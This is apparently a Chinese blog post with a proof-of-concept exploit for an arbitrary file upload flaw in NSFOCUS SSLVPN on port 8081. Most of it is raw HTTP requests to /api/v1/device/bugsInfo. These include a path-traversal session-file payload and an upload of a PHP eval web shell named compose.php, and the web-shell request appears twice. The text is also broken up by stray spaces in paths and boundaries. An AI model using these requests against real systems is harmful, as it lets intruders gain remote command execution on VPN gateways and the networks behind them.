漏洞描述:
绿盟 SSLVPN 存在任意文件上传漏洞,攻击者通过发送特殊的请求包可以获取服务器权限,进行远程命令执行
漏洞影响:
绿盟 SSLVPN
网络测绘:
出现漏洞的端口为 8081
1 2 3 4 5 6 7 8 9 10 |
POST /api/v 1 /device/bugsInfo HTTP/ 1.1
Content-Type: multipart/form-data; boundary= 1 d 52 ba 2 a 11 ad 8 a 915 eddab 1 a 0 e 85 acd 9
Host:
- -1 d 52 ba 2 a 11 ad 8 a 915 eddab 1 a 0 e 85 acd 9
Content-Disposition: form-data; name= "file" ; filename= "sess_82c13f359d0dd8f51c29d658a9c8ac71"
lang|s: 52: "../../../../../../../../../../../../../../../../tmp/" ;
- -1 d 52 ba 2 a 11 ad 8 a 915 eddab 1 a 0 e 85 acd 9 --
|
1 2 3 4 5 6 7 8 9 10 11 |
POST /api/v 1 /device/bugsInfo HTTP/ 1.1
Content-Type: multipart/form-data; boundary= 4803 b 59 d 015026999 b 45993 b 1245 f 0 ef
Host:
- -4803 b 59 d 015026999 b 45993 b 1245 f 0 ef
Content-Disposition: form-data; name= "file" ; filename= "compose.php"
<?php eval($_POST[ 'cmd' ]);?>
- -4803 b 59 d 015026999 b 45993 b 1245 f 0 ef--
|
1 2 3 4 5 6 7 8 9 10 11 |
POST /api/v 1 /device/bugsInfo HTTP/ 1.1
Content-Type: multipart/form-data; boundary= 4803 b 59 d 015026999 b 45993 b 1245 f 0 ef
Host:
- -4803 b 59 d 015026999 b 45993 b 1245 f 0 ef
Content-Disposition: form-data; name= "file" ; filename= "compose.php"
<?php eval($_POST[ 'cmd' ]);?>
- -4803 b 59 d 015026999 b 45993 b 1245 f 0 ef--
|
标签:绿盟,form,..,--,NF,Content,漏洞,4803b59d015026999b45993b1245f0ef,data From: https://www.cnblogs.com/1zzZ/p/17635728.html